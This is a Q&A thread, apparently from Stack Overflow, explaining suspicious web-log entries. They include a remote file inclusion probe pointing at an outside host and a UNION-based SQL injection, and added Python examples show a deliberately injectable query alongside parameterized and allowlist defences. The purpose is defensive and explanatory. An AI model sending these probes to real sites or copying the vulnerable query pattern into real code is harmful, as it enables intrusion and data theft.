+4
A:
The `x=19&y=15` looks like you have a form on your site with `method=get` and an `input type=image`. Do you log referrer?
Martin Smith
2010-05-04 17:39:53
We have forms, but not off the root path like that.... unless our web guy has experiments lying around. I don't think that any of the forms have image types, but thanks for the info. We do log referrer, but I am still looking for that because I'm locked out of AWStats in cPanel.
CheeseConQueso
2010-05-04 17:52:52
Whatever, it seems pretty innocuous compared to the other 2 entries!
Martin Smith
2010-05-04 19:07:54
A:
`/?id=http://nic.bupt.edu.cn/media/j1.txt??` looks like some sort of cross-site stuff, a useless one because it loads a plain text file O_O
Alfabravo
2010-05-04 17:42:48
The PHP scripts are text files, like many others. The thing is: that particular request points to a plain text file which is not *executed* by any browser, plugin or application (besides gedit or notepad... or shown by the browser as a sequence of characters disposed in a certain order).
Alfabravo
2010-05-04 20:44:56
+5
A:
These (except for the top one) are automated(?) attempts to find weaknesses in the code;
`/?id=http://nic.bupt.edu.cn/media/j1.txt??`
Tries to import a PHP page from another server. A well-known problem, especially with older PHP software.
The `UNION ALL SELECT 1` is an obvious SQL insertion attempt. Schema ID `0x73636363726F6F745F7075626C6963` decodes to "scccroot_public". I'm not sure for which database this is. But they are trying to take control of it, that's sure.
wump
2010-05-04 17:43:10
Awesome, thanks for the info... scccroot_public is our public DB and we only have a user with select privs.... Will this person/bot still be able to claim itself as a DBA?
CheeseConQueso
2010-05-04 17:53:57
One of the interesting things to note about this UNION query is that it apparently only works because you have a query where you check for a number without using quotes. If you always surround arguments to be checked with quotes, along with proper data escaping and sanitization (such as `mysql_real_escape_string()`), then you shouldn't be vulnerable to this sort of thing. As it stands, though, without using quotes around the numerical argument in your query, even running a typical sanitization routine like `mysql_real_escape_string()` won't help.
Dereleased
2010-05-04 18:21:54
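The numeric-context point Dereleased makes above, as an added example that is not code from the thread or from the asker's site: the same `id` value is run through an unquoted query, a quoted-and-escaped query, and a parameterized query. It uses Python's built-in `sqlite3` in place of MySQL, with a constructed two-table schema (`items`, `accounts`) and a minimal quote-doubling stand-in for `mysql_real_escape_string()`; all of those names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample schema and rows; table and column names are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, title TEXT)")
    conn.execute("CREATE TABLE accounts (id INTEGER, login TEXT, secret TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "first"), (2, "second")])
    conn.execute("INSERT INTO accounts VALUES (1, 'admin', 'placeholder-secret')")
    conn.commit()
    return conn


def escape_string(value):
    # Minimal stand-in for mysql_real_escape_string(): it can only neutralize quote
    # characters. It has no way of knowing whether the value will sit inside quotes.
    return value.replace("'", "''")


def lookup_unquoted(conn, user_id):
    # The pattern discussed in the thread: a number interpolated without quotes.
    # The escaped text is still parsed as SQL, so escaping changes nothing here.
    sql = "SELECT id, title FROM items WHERE id = " + escape_string(user_id)
    return conn.execute(sql).fetchall()


def lookup_quoted(conn, user_id):
    # Quoted and escaped: whatever was sent stays inside a single string literal,
    # so the UNION is inert. The database compares a number with a piece of text.
    sql = "SELECT id, title FROM items WHERE id = '" + escape_string(user_id) + "'"
    return conn.execute(sql).fetchall()


def validate_id(value):
    """Shape check for an identifier parameter: decimal digits only."""
    return value.isdigit()


def lookup_parameterized(conn, user_id):
    # Preferred: validate the shape, then bind the value so it is never parsed as SQL.
    if not validate_id(user_id):
        raise ValueError("id must be a decimal integer")
    return conn.execute(
        "SELECT id, title FROM items WHERE id = ?", (int(user_id),)
    ).fetchall()


# Constructed probe in the style of the "UNION ALL SELECT" entry in the thread's log.
PROBE = "1 UNION ALL SELECT login, secret FROM accounts"


if __name__ == "__main__":
    db = make_db()
    print("unquoted:", lookup_unquoted(db, PROBE))       # leaks the accounts row
    print("quoted:", lookup_quoted(db, PROBE))           # no row matches
    print("parameterized:", lookup_parameterized(db, "1"))
```

With SQLite the quoted form returns no row, because the text `'1 UNION ALL ...'` is not a well-formed number and so never equals the integer `1`; MySQL would coerce that string to `1` (with a warning) and return the legitimate row instead. Either way the injected `UNION` never executes, which is the behaviour Dereleased describes. The parameterized form is the one to prefer: the shape check rejects the probe outright, and a value that passes is bound as data rather than spliced into the statement text.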
There are plenty of moronic unzip-and-get-pwned templating scripts out there. Most likely one (or more) has a `<?php include($_GET['id']) ?>` construct in it for which this attacker is probing.
Marc B
2010-05-05 03:05:28
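The `include($_GET['id'])` construct Marc B describes takes an untrusted value straight into a file include, which is why the `/?id=http://...` request in the log is worth worrying about. As an added example that is not code from the thread or from any script discussed in it, here is the confinement logic written in Python: the `id` value is classified (remote URL, traversal, not on the allowlist, or acceptable) before it is ever mapped to a file, and the same classifier is run over a few constructed request paths the way one might scan an access log. `TEMPLATE_ROOT` and `ALLOWED_PAGES` are assumed values for the example.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Assumed directory layout and page allowlist for this example; not from the thread.
TEMPLATE_ROOT = "/srv/app/templates"
ALLOWED_PAGES = {"home", "about", "contact"}


def classify_include_param(value):
    """Map an untrusted ?id= value to ('ok', local_path) or ('<reason>', None)."""
    if not value:
        return ("empty", None)
    # A URL scheme (http:, ftp:, php:, data:, ...) means a remote or stream-wrapper
    # include attempt; a page name never has one.
    if urlsplit(value).scheme:
        return ("remote-url", None)
    # Separators, NUL bytes and '..' are attempts to leave the template directory.
    if any(token in value for token in ("/", "\\", "\x00", "..")):
        return ("traversal", None)
    # Only names on the allowlist map to a file at all.
    if value not in ALLOWED_PAGES:
        return ("not-allowlisted", None)
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, value + ".php"))
    # Defence in depth: the normalized path must still sit below the template root.
    if posixpath.commonpath([TEMPLATE_ROOT, candidate]) != TEMPLATE_ROOT:
        return ("traversal", None)
    return ("ok", candidate)


def scan_requests(request_paths):
    """Return (path, reason) for each request whose id= value the classifier rejects."""
    findings = []
    for path in request_paths:
        query = urlsplit(path).query
        for value in parse_qs(query, keep_blank_values=True).get("id", []):
            reason, _ = classify_include_param(value)
            if reason != "ok":
                findings.append((path, reason))
    return findings


# Constructed sample of request paths; the second one is the probe quoted in the thread.
SAMPLE_REQUESTS = [
    "/?id=home",
    "/?id=http://nic.bupt.edu.cn/media/j1.txt??",
    "/?id=../../config",
    "/?x=19&y=15",
]


if __name__ == "__main__":
    for path, reason in scan_requests(SAMPLE_REQUESTS):
        print(f"{reason:16s} {path}")
```

The allowlist is what actually closes the hole: with it in place the scheme and traversal checks are redundant for safety, but they let a log scan say *why* a request was rejected, which is far more useful when deciding whether an entry is a harmless bot probe or a sign that something on the site is already exposed. The `x=19&y=15` line from the thread carries no `id` parameter and produces no finding.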